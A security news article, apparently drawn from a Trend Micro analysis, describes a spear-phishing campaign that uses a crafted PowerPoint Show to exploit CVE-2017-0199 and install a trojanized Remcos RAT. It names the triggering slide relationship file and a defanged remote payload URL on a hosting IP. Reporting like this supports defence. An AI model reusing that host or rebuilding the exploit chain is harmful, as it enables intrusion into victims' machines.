In April Microsoft fixed the CVE-2017-0199 vulnerability in Office after threat actors had been exploiting it in the wild.The same vulnerability is now been found to be used hidden behind a specially crafted PowerPoint (PPSX) Presentation file.
CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware. It is commonly exploited via the use of malicious Rich Text File (RTF) documents.
According to the researchers at Trend Micro, who spotted the malware campaign, the targeted attack starts with a convincing spear-phishing email attachment, purportedly from a cable manufacturing provider and mainly targets companies involved in the electronics manufacturing industry.
The exploit arrives as a spear-phishing email attachment, purportedly from a cable manufacturing provider, that drops a remote access tool as its final payload.
When the malicious PowerPoint Show is opened, it shows the text CVE-2017-8570, which is a different Microsoft Office vulnerability. However, based on our analysis, it actually exploits CVE-2017-0199 instead. This is a leftover mistake from the toolkit developer, which the sender did not choose to change.
The file triggers a script moniker in ppt/slides/_rels/slide1[.]xml[.]rels. The exploit runs the remote code at hxxp://192[.]166[.]218[.]230:3550/logo[.]doc, which is a VPN or hosting service that is abused by the attacker.
If we run the sample, PowerPoint will initialize the script moniker and run the remote malicious payload via the PowerPoint Show animations feature.
RATMAN.exe is a Trojanized version of the Remcos Remote Control tool, which when installed, allows attackers to control infected computers from its command-and-control server remotely.
The easiest way to prevent yourself completely from this attack is to download and apply patches released by Microsoft in April that will address the CVE-2017-0199 vulnerability.